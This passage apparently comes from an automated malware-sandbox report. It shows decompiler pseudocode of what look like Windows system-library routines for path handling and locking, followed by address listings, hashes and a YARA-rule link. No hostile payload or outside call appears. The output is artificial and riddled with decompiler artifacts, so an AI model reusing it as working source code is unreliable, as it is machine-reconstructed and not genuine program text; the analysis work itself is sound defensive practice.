													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M016745F8))) {
												case 0:
													_v568 = 0x1631078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x16311c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L01674620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0169F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0169F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E016552A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0166EB70(1, 0x17479a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0166AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E016995D0();
																			L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0169B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E01693D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0169B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                      0x01674128
                                                      0x01674135
                                                      0x0167413c
                                                      0x01674141
                                                      0x01674145
                                                      0x01674147
                                                      0x0167414e
                                                      0x01674151
                                                      0x01674159
                                                      0x0167415c
                                                      0x01674160
                                                      0x01674164
                                                      0x01674168
                                                      0x0167416c
                                                      0x0167417f
                                                      0x01674181
                                                      0x0167446a
                                                      0x0167446a
                                                      0x0167418c
                                                      0x01674195
                                                      0x01674199
                                                      0x01674432
                                                      0x01674439
                                                      0x0167443d
                                                      0x01674442
                                                      0x01674447
                                                      0x00000000
                                                      0x0167419f
                                                      0x016741a3
                                                      0x016741b1
                                                      0x016741b9
                                                      0x016741bd
                                                      0x016745db
                                                      0x016745db
                                                      0x00000000
                                                      0x016741c3
                                                      0x016741c3
                                                      0x016741ce
                                                      0x016741d4
                                                      0x016be138
                                                      0x016be13e
                                                      0x016be169
                                                      0x016be16d
                                                      0x016be19e
                                                      0x016be16f
                                                      0x016be16f
                                                      0x016be175
                                                      0x016be179
                                                      0x016be18f
                                                      0x016be193
                                                      0x00000000
                                                      0x016be199
                                                      0x00000000
                                                      0x016be199
                                                      0x016be193
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x016741da
                                                      0x016741da
                                                      0x016741df
                                                      0x016741e4
                                                      0x016741ec
                                                      0x01674203
                                                      0x01674207
                                                      0x016be1fd
                                                      0x01674222
                                                      0x01674226
                                                      0x016be1f3
                                                      0x016be1f3
                                                      0x0167422c
                                                      0x0167422c
                                                      0x01674233
                                                      0x016be1ed
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01674239
                                                      0x01674239
                                                      0x01674239
                                                      0x01674239
                                                      0x01674233
                                                      0x01674226
                                                      0x016741ee
                                                      0x016741ee
                                                      0x016741f4
                                                      0x01674575
                                                      0x016be1b1
                                                      0x016be1b1
                                                      0x00000000
                                                      0x0167457b
                                                      0x0167457b
                                                      0x01674582
                                                      0x016be1ab
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01674588
                                                      0x01674588
                                                      0x0167458c
                                                      0x016be1c4
                                                      0x016be1c4
                                                      0x00000000
                                                      0x01674592
                                                      0x01674592
                                                      0x01674599
                                                      0x016be1be
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0167459f
                                                      0x0167459f
                                                      0x016745a3
                                                      0x016be1d7
                                                      0x016be1e4
                                                      0x00000000
                                                      0x016745a9
                                                      0x016745a9
                                                      0x016745b0
                                                      0x016be1d1
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x016745b6
                                                      0x016745b6
                                                      0x016745b6
                                                      0x00000000
                                                      0x016745b6
                                                      0x016745b0
                                                      0x016745a3
                                                      0x01674599
                                                      0x0167458c
                                                      0x01674582
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x016741f4
                                                      0x0167423e
                                                      0x01674241
                                                      0x016745c0
                                                      0x016745c4
                                                      0x00000000
                                                      0x016745ca
                                                      0x016745ca
                                                      0x00000000
                                                      0x016be207
                                                      0x016be20f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x016745d1
                                                      0x00000000
                                                      0x00000000
                                                      0x016745ca
                                                      0x00000000
                                                      0x01674247
                                                      0x01674247
                                                      0x01674247
                                                      0x01674249
                                                      0x01674249
                                                      0x01674249
                                                      0x01674251
                                                      0x01674251
                                                      0x01674257
                                                      0x0167425f
                                                      0x0167426e
                                                      0x01674270
                                                      0x0167427a
                                                      0x016be219
                                                      0x016be219
                                                      0x01674280
                                                      0x01674282
                                                      0x01674456
                                                      0x016745ea
                                                      0x00000000
                                                      0x016745f0
                                                      0x016be223
                                                      0x00000000
                                                      0x016be223
                                                      0x0167445c
                                                      0x0167445c
                                                      0x00000000
                                                      0x0167445c
                                                      0x00000000
                                                      0x01674288
                                                      0x0167428c
                                                      0x016be298
                                                      0x01674292
                                                      0x01674292
                                                      0x0167429e
                                                      0x016742a3
                                                      0x016742a7
                                                      0x016742ac
                                                      0x016be22d
                                                      0x016742b2
                                                      0x016742b2
                                                      0x016742b9
                                                      0x016742bc
                                                      0x016742c2
                                                      0x016742ca
                                                      0x016742cd
                                                      0x016742cd
                                                      0x016742d4
                                                      0x0167433f
                                                      0x0167433f
                                                      0x016742d6
                                                      0x016742d6
                                                      0x016742d9
                                                      0x016742dd
                                                      0x016742eb
                                                      0x016be23a
                                                      0x016742f1
                                                      0x01674305
                                                      0x0167430d
                                                      0x01674315
                                                      0x01674318
                                                      0x0167431f
                                                      0x01674322
                                                      0x0167432e
                                                      0x0167433b
                                                      0x0167433b
                                                      0x00000000
                                                      0x0167432e
                                                      0x016742eb
                                                      0x0167434c
                                                      0x0167434e
                                                      0x01674352
                                                      0x01674359
                                                      0x0167435e
                                                      0x01674361
                                                      0x0167436e
                                                      0x0167438a
                                                      0x0167438e
                                                      0x01674396
                                                      0x0167439e
                                                      0x016743a1
                                                      0x016743ad
                                                      0x016743bb
                                                      0x016743bb
                                                      0x016743ad
                                                      0x0167436e
                                                      0x016743bf
                                                      0x016743c5
                                                      0x01674463
                                                      0x01674463
                                                      0x016743ce
                                                      0x016743d5
                                                      0x016743d9
                                                      0x016743df
                                                      0x01674475
                                                      0x01674479
                                                      0x01674491
                                                      0x01674491
                                                      0x01674479
                                                      0x016743e5
                                                      0x016743eb
                                                      0x016743f4
                                                      0x016743f6
                                                      0x016743f9
                                                      0x016743fc
                                                      0x016743ff
                                                      0x016744e8
                                                      0x016744ed
                                                      0x016744f3
                                                      0x016be247
                                                      0x00000000
                                                      0x016744f9
                                                      0x01674504
                                                      0x01674508
                                                      0x0167450f
                                                      0x016be269
                                                      0x00000000
                                                      0x01674515
                                                      0x01674519
                                                      0x01674531
                                                      0x01674534
                                                      0x01674537
                                                      0x0167453e
                                                      0x01674541
                                                      0x0167454a
                                                      0x016be255
                                                      0x016be255
                                                      0x016be25b
                                                      0x016be25e
                                                      0x016be261
                                                      0x016be261
                                                      0x01674555
                                                      0x01674559
                                                      0x0167455d
                                                      0x016be26d
                                                      0x016be270
                                                      0x016be274
                                                      0x016be27a
                                                      0x016be27d
                                                      0x016be28e
                                                      0x016be28e
                                                      0x01674563
                                                      0x01674563
                                                      0x01674569
                                                      0x01674569
                                                      0x00000000
                                                      0x0167455d
                                                      0x0167450f
                                                      0x00000000
                                                      0x016744f3
                                                      0x016743ff
                                                      0x01674405
                                                      0x01674405
                                                      0x01674405
                                                      0x016742ac
                                                      0x0167428c
                                                      0x01674282
                                                      0x01674407
                                                      0x0167440d
                                                      0x016be2af
                                                      0x016be2af
                                                      0x01674413
                                                      0x01674413
                                                      0x00000000
                                                      0x016741d4
                                                      0x00000000
                                                      0x016741c3
                                                      0x016741bd
                                                      0x01674415
                                                      0x01674415
                                                      0x01674416
                                                      0x01674417
                                                      0x01674429
                                                      0x0167416e
                                                      0x0167416e
                                                      0x01674175
                                                      0x01674498
                                                      0x0167449f
                                                      0x016be12d
                                                      0x00000000
                                                      0x016be133
                                                      0x00000000
                                                      0x016be133
                                                      0x016744a5
                                                      0x016744a5
                                                      0x016744aa
                                                      0x00000000
                                                      0x016744bb
                                                      0x016744ca
                                                      0x016744d6
                                                      0x016744d7
                                                      0x016744d8
                                                      0x016744e3
                                                      0x016744e3
                                                      0x016744aa
                                                      0x0167417b
                                                      0x0167417b
                                                      0x0167417b
                                                      0x00000000
                                                      0x0167417b
                                                      0x01674175
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: af52ccb5da2998a4d6b43c061fa044ed38b2dc17bdcc6c0b83f306b16c1d17fd
                                                      • Instruction ID: adfc3f8100af9c682cdaf8424c96fa7ff4ecfae93b2b383ebb2faa1bd13d792e
                                                      • Opcode Fuzzy Hash: af52ccb5da2998a4d6b43c061fa044ed38b2dc17bdcc6c0b83f306b16c1d17fd
                                                      • Instruction Fuzzy Hash: 43F180706082118FD724CF69C884ABAB7E1FF98714F15892EF596CB350EB35D892CB52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016820A0, Relevance: .4, Instructions: 420COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E016820A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1748714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E01682EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E01682EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E016558EC(_t240);
									_t221 =  *0x1745cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1745cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E01694A2C(0x1746e40, 0x1694b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E01677D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x1635c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0168F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0168F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E016D7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L01672400(_t267 + 0x20);
															}
															L01672400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E01682397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E01672280(_t134, 0x1748608);
									__eflags =  *0x1746e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0166FFB0(_t198, _t241, 0x1748608);
										__eflags = _t253;
										if(_t253 != 0) {
											L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1746e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1748608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E01686B90(_t210,  &_v64);
										_t262 =  *0x1748608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0168E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E016997C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0169006A(0x1748608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x1748608);
												E0169B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x1746904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x1746e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E0166FFB0(_t198, _t240, 0x1748608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E016900C2(0x1748608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                      0x016820a0
                                                      0x016820a8
                                                      0x016820ad
                                                      0x016820b3
                                                      0x016820b8
                                                      0x016820c2
                                                      0x016820c7
                                                      0x016820cb
                                                      0x016820d2
                                                      0x01682263
                                                      0x01682266
                                                      0x016c5836
                                                      0x016c5836
                                                      0x00000000
                                                      0x0168226c
                                                      0x0168226c
                                                      0x01682270
                                                      0x01682274
                                                      0x016820e2
                                                      0x016820e2
                                                      0x016820e6
                                                      0x016820ee
                                                      0x016c57dc
                                                      0x016c57de
                                                      0x016c57ec
                                                      0x016c57ec
                                                      0x016c57f1
                                                      0x016c57f3
                                                      0x016c57f8
                                                      0x00000000
                                                      0x016c57f8
                                                      0x016c57e0
                                                      0x016c57e4
                                                      0x016c57ea
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x016c57ea
                                                      0x016820f4
                                                      0x016820f4
                                                      0x016820f8
                                                      0x016820f8
                                                      0x016820fc
                                                      0x01682100
                                                      0x01682106
                                                      0x01682201
                                                      0x01682206
                                                      0x0168220b
                                                      0x0168220e
                                                      0x016822a9
                                                      0x016822ac
                                                      0x00000000
                                                      0x00000000
                                                      0x016822b2
                                                      0x016822b5
                                                      0x016c5801
                                                      0x016c5806
                                                      0x00000000
                                                      0x00000000
                                                      0x016c5810
                                                      0x016c5815
                                                      0x016c5818
                                                      0x00000000
                                                      0x00000000
                                                      0x016c581e
                                                      0x016822bb
                                                      0x016822bb
                                                      0x01682218
                                                      0x01682218
                                                      0x0168221c
                                                      0x01682220
                                                      0x01682222
                                                      0x016822c2
                                                      0x016822c4
                                                      0x016822dc
                                                      0x016822dc
                                                      0x016822e1
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x016822e7
                                                      0x016822c8
                                                      0x016822cd
                                                      0x016822d3
                                                      0x016822d6
                                                      0x016c5823
                                                      0x016c5825
                                                      0x016c5827
                                                      0x00000000
                                                      0x00000000
                                                      0x016c582d
                                                      0x00000000
                                                      0x016c582d
                                                      0x00000000
                                                      0x01682228
                                                      0x01682228
                                                      0x00000000
                                                      0x01682228
                                                      0x01682222
                                                      0x01682214
                                                      0x01682214
                                                      0x00000000
                                                      0x01682114
                                                      0x01682114
                                                      0x01682114
                                                      0x0168211a
                                                      0x0168211c
                                                      0x01682348
                                                      0x0168234d
                                                      0x016c5840
                                                      0x016c5845
                                                      0x016c5848
                                                      0x016c584e
                                                      0x016c584e
                                                      0x016c5848
                                                      0x01682353
                                                      0x01682355
                                                      0x01682388
                                                      0x01682388
                                                      0x01682368
                                                      0x0168236a
                                                      0x0168236c
                                                      0x0168238f
                                                      0x00000000
                                                      0x0168236e
                                                      0x0168236e
                                                      0x0168218e
                                                      0x0168218e
                                                      0x01682191
                                                      0x01682195
                                                      0x016c5a03
                                                      0x016c5a06
                                                      0x016c5a0c
                                                      0x016c5a0f
                                                      0x016c5a11
                                                      0x016c5a13
                                                      0x016c5a13
                                                      0x016c5a19
                                                      0x016c5a1f
                                                      0x00000000
                                                      0x0168219b
                                                      0x0168219b
                                                      0x016821a0
                                                      0x01682282
                                                      0x01682284
